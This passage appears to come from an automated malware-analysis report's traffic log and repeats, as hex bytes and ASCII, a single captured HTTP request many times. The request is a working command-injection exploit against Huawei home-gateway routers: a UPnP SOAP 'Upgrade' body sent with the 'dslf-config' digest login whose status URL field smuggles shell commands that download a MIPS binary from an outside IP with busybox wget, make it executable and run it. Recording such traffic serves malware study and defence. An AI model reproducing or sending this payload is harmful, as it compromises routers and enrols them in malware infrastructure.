70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
